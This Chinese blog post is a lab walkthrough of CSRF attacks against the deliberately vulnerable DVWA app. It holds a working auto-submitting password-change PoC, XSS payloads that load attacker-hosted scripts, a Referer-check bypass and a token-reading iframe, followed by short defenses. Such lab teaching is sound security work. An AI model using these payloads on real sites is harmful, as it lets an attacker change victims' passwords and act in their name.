web安全-----CSRF漏洞

最新推荐文章于 2024-04-05 17:39:52 发布
最新推荐文章于 2024-04-05 17:39:52 发布
阅读量383 收藏
点赞数
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/114358077
版权
简述

CSRF:Cross-site request -forgery,跨站请求伪造,是一种web攻击方式,是由于网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要访问这个网站,都会默认你已经登录。

危害

攻击者可以利用你的身份,以你的名义发送恶意请求。cerf能够做的事情包括:以你的名义发送邮件,发信息,盗取你的账号,甚至购买商品,虚拟商品转账

CSRF之POC制作

测试环境:DVWA的CSRF,low
1、利用burpsuit生成CSRF_POC
打开要测试的页面,burpsuit拦截
在这里插入图片描述
右键,找到下图的东西
在这里插入图片描述
点击Generate CSRF Poc
在这里插入图片描述

由于burp生成的poc需要点击按钮才能触发 用户很难上当受骗 这里用js添加一个自动点击事件,

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
	<iframe name="target" style="display: none;"></iframe>
	<!--
    	iframe将作为跳转的接收页,为了隐藏我们使用display:none,不显示
    -->
    <form action="http://IP/dvwa/vulnerabilities/csrf/" id="form" target="target">
      <input type="hidden" name="password&#95;new" value="123456" />
      <input type="hidden" name="password&#95;conf" value="123456" />
      <input type="hidden" name="Change" value="Change" />
    </form>
    <script>
    	var form = document.getElementById("form");
    	form.submit();
    </script>
  </body>
</html>

将此html放在自己服务器上,保证能访问到,dvwa这边处于登陆状态,然后使用同一浏览器,访问刚刚构造的POC,DVWA默认的密码为password

http://IP/csrf/csrf.html

在这里插入图片描述
在这里插入图片描述
密码成功修改

2、csrf绕过referer验证

很多网站会通过验证referer是否合法来判断是否是用户操作,但是他可能只是验证referer中是否
包含该网站的referer。如DVWA的判断原理是取出请求中的referer值,然后将host的值取出,然
后判断在referer值中有没有出现host值,如果出现则认为是正常请求,否则就拒绝请求。
绕过思路:将攻击文件的文件名改为该网站的域名(请求时的host值).

3、结合XSS
构造我们的payload,使用DVWA的反射型XSS测试

<script src="x" onerror=javascript:window.open("http://IP/csrf/csrf.html")></script>

在这里插入图片描述

访问之后,成功修改
在这里插入图片描述
另一种方式:

var form = document.createElement('form');
form.action='http://192.168.1.44/DVWA-master/vulnerabilities/csrf/';
form.target='target';
var pass1 = document.createElement('input');
pass1.name="password_new";
pass1.value = '123456';
var pass2 = document.createElement('input');
pass2.name = 'password_conf';
pass2.value = "123456";
var change = document.createElement('input');
change.name='Change';
change.value='Change';
form.appendChild(pass1);
form.appendChild(pass2);
form.appendChild(change);
document.body.append(form)
form.submit();

payload

<script src="http://192.168.1.7/st_test/csrf/csrf_js_poc.js">
</script>

4、csrf结合xss绕过token防御
token作为身份令牌,如果该值足够随机,那么安全系数将是很高的,按照这种逻辑这里不应该
存在csrf漏洞,但是如果网站存在XSS漏洞的话,那么这里的token就将形同虚设。我们可以利用
xss获取到token值,然后利用该值发起请求,从而构造相应从csrf攻击。但是这里存在一个问
题,那就是同源策略会限制我们的脚本,这里我们只能打出token,然后再诱惑用户点击我们构造
的页面,这样也会造成危害,但是这里由于token随机性,可能每次刷新页面就会失效,所以可
利用的概率就比较小了。

<iframe src='../csrf/' onload="alert(frames[0].document.getElementsByName('user_token')
[0].value)">
防御
  • 关键操作增加验证码
  • 验证referer
  • 使用足够随机的token
p0inter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞利用】CSRF跨站请求伪造-详解
weixin_44023442的博客
03-03 616
参考文章 CSRF攻击与防御 CSRF & CORS 读取型CSRF-需要交互的内容劫持 Tag: Ref: 本片文章仅供学习使用,切勿触犯法律! 未写完,待补充 概述 总结 一、漏洞介绍 CSRF(Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,是一种对网站的恶意利用。==它与XSS非常不同,XSS利用站点内信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。==与XSS攻击相比,CSR
Day56:WEB攻防-CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除
qq_61553520的博客
03-30 620
小迪安全-Day56:WEB攻防-CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除
window.open
zhangshenqiu的专栏
04-28 486
    window.open (page.html, newwindow, height=100, width=400, top=0, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=n o, status=no) //这句要写成一行  -->         参数解释:      js脚本开
跨站请求伪造漏洞CSRF
最新发布
qq_44484541的博客
04-05 1212
CSRF(Cross-Site Request Forgery),也被称为 one-click attack 或者 session riding,即跨站请求伪造攻击。
Web安全CSRF跨站请求伪造攻击解析
Senimo
07-16 842
Web安全CSRF跨站请求伪造攻击解析CSRF漏洞简介CSRF攻击类型按请求类型按攻击方式CSRF漏洞利用场景针对CSRF防护方案添加中间环节验证用户请求合法性用户层面CSRF漏洞的检测CSRF 漏洞总结参考资料 CSRF漏洞简介 1. CSRF漏洞简介 跨站请求伪造(Cross-site request forgery),通常缩写为CSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。OWASP于2007年将CSRF归类进 OWASP TOP10 的安全风险中。 2. CS
网安面试准备的csrf漏洞原理、防范、危害、绕过(1)
m0_52556798的博客
03-15 1657
第一问别笑,面试真被问过,人麻了 Csrf中英文全称分别是什么? 跨站请求伪造 CSRF(Cross-site request forgery) 造成csrf攻击的条件什么? 登录受信任站点 A,并在本地生成cookie; 在不登出站点A(清除站点A的cookie)的情况下,访问恶意站点B。 csrf攻击原理是什么? 笼统的说就是,攻击者盗用了我的身份,以我的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作。 就比如说: 1. 我成功登录网站A并且产生了cooki
CSRF的绕过方法与利用
weixin_50464560的博客
10-01 2904
转载至https://threezh1.com/2020/02/25/CSRF%E7%BB%95%E8%BF%87%E6%95%B4%E7%90%86/ Origin & Referer BypassNull值绕过当遇到一个cors可用null值绕过时,用iframe配合data协议,就可以发送一个origin为null的请求。这个绕过方式同样也可以用在CSRF这里。 1<iframe sandbox="allow-scripts allow-top-navigation allow-fo
常见WEB漏洞整理-CSRF
06-11
适合由于初学者进行框架了解,和大师傅们进行回顾
CSRF漏洞防御-01
09-15
CSRF漏洞防御是一种非常重要的安全机制,它可以防止恶意攻击者对Web应用程序的攻击。CSRF漏洞防御主要包括四种方法:验证码防御、Referer Check防御、Anti CSRF Token防御和Token泄露。 验证码防御 验证码防御是一...
web安全-dvwa实战手
07-05
文件上传:介绍文件上传漏洞是如何允许攻击者上传恶意文件到目标服务器,并探讨可能导致的安全风险和防护方法。 5。SQL回显注入:说明SQL回显注入是一种允许攻击者执行恶意SQL查询的漏洞。探讨如何利用该漏洞来访问...
CSRF漏洞利用方法-01
09-15
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web应用安全漏洞,攻击者可以利用CSRF漏洞来欺骗用户浏览器执行恶意操作。本文将介绍四种CSRF漏洞利用方法,分别是链接利用、iframe利用、img标签利用...
CSRF漏洞token防御介绍-01
09-15
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的 Web 应用安全漏洞,它允许攻击者在用户不知情的情况下,伪造用户的请求,导致用户执行非预期的操作。为了防御 CSRF 漏洞, Token 防御是一种常用的...
CSRF的绕过与利用
mingyqf的博客
03-24 189
Threezh1’Blog 转载至:https://threezh1.com/2020/02/25/CSRF%E7%BB%95%E8%BF%87%E6%95%B4%E7%90%86/ CSRF的绕过与利用 February 25th 2020, 12:00:00 pm 目录 Origin & Referer Bypass Null值绕过 域名校验绕过 配合XSS进行利用 获取表单中的token 获取url参数中的token 配合URL跳转漏洞 X-Request-with Bypas
CSRF漏洞精讲
Kevin's Blog
05-13 784
文章目录一、漏洞介绍1.1 含义1.2 漏洞实质1.3 攻击过程1.4 满足条件1.5 XSS和CSRF区别二、靶机实战三、漏洞利用四、防御措施 一、漏洞介绍 1.1 含义   CSRF(Cross-site Request Forgery,跨站请求伪造),缩写CSRF,也有少数文章称为XSRF,一种利用用户在当前已登录的Web应用程序上执行非本意操作的攻击方法(利用受害者尚未失效的身份认证信息(cookie,会话等),创建恶意伪造的web页面请求,在受害者不知情的情况下向服务器发送请求完成非法操作(转账、
CSRF(跨站请求伪造)漏洞
weixin_50464560的博客
08-25 1277
CSRF(Cross-site request forgery) 跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解 攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 漏洞危害 修改用户信息,修改密码,以你的名义发送邮件、发消息、盗取你的账号等 攻击条件 用户已登录存在CSRF漏洞的网站 用户需要被诱导打开攻击者构造的恶意网站 攻击过程 .
web安全CSRF漏洞——苦日7小时
weixin_52351575的博客
05-09 781
要想有CSRF漏洞,那么必须得参数可控,如果csrfcsrfKeysession三者互相绑定在一起,那么就没戏.如果csrfcsrfkey是互相绑定的,但是session没有和他们绑定,那就相当于靶场4,一样可以绕过.
burpsuite生成POC验证CSRF过程及原理
qq_41123867的博客
02-19 1万+
一.CSRF漏洞成因: 浏览器访问web服务器A,登录状态下,再用同一个浏览器访问了恶意服务器B,服务器B返回给浏览器的页面中含有要求访问服务器A的恶意代码,用户不知情的情况下点击后,导致服务器A接收到来自服务器B的通过浏览器发起的恶意请求 根据上图可知,要验证CSRF,需要在访问网站A后获得cookie后,再访问一个会返回恶意代码的网站B,返回的恶意代码必须能导致访问网站A ,如果能通过返回的...
CSRF漏洞-01】跨站请求伪造漏洞靶场实战
cc
02-19 4033
跨站请求伪造(Cross-site request forgery,CSRF)是一种攻击,它强制终端用户在当前对其进行身份验证后的web应用程序上执行非本意的操作。CSRF攻击的主要目的在伪造更改状态(修改密码、转账等)的请求,而不是盗取数据,因为攻击者无法查看对伪造请求的响应。借助社工的一些帮助(例如通过电子邮件或聊天发送链接),攻击者可以诱骗用户执行攻击者选择的操作。
CSRF漏洞
热门推荐
weixin_39861994的博客
10-29 1万+
一、CSRF漏洞介绍: CSRF是指利用受害者尚未失效的身份认证信息( cookie、会话 等信息),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下 以受害者的身份向服务器发送请求,从而完成非法操作(如转账、改密、信息修改等操作)。 CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用 二、CSRF类型: get请求型CSRF 只需要构造URL,然后诱导受害者访问利用。 POST请求型CSRF 构造自动提交的...
DVWA-WEB漏洞
07-28
它包含了各种常见的Web应用漏洞,如SQL注入、XSS(跨站脚本攻击)、CSRF(跨站请求伪造)等。通过使用DVWA,安全专业人员可以模拟真实的攻击场景,并学习如何防御这些漏洞。 要使用DVWA,你需要搭建一个本地的Web...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值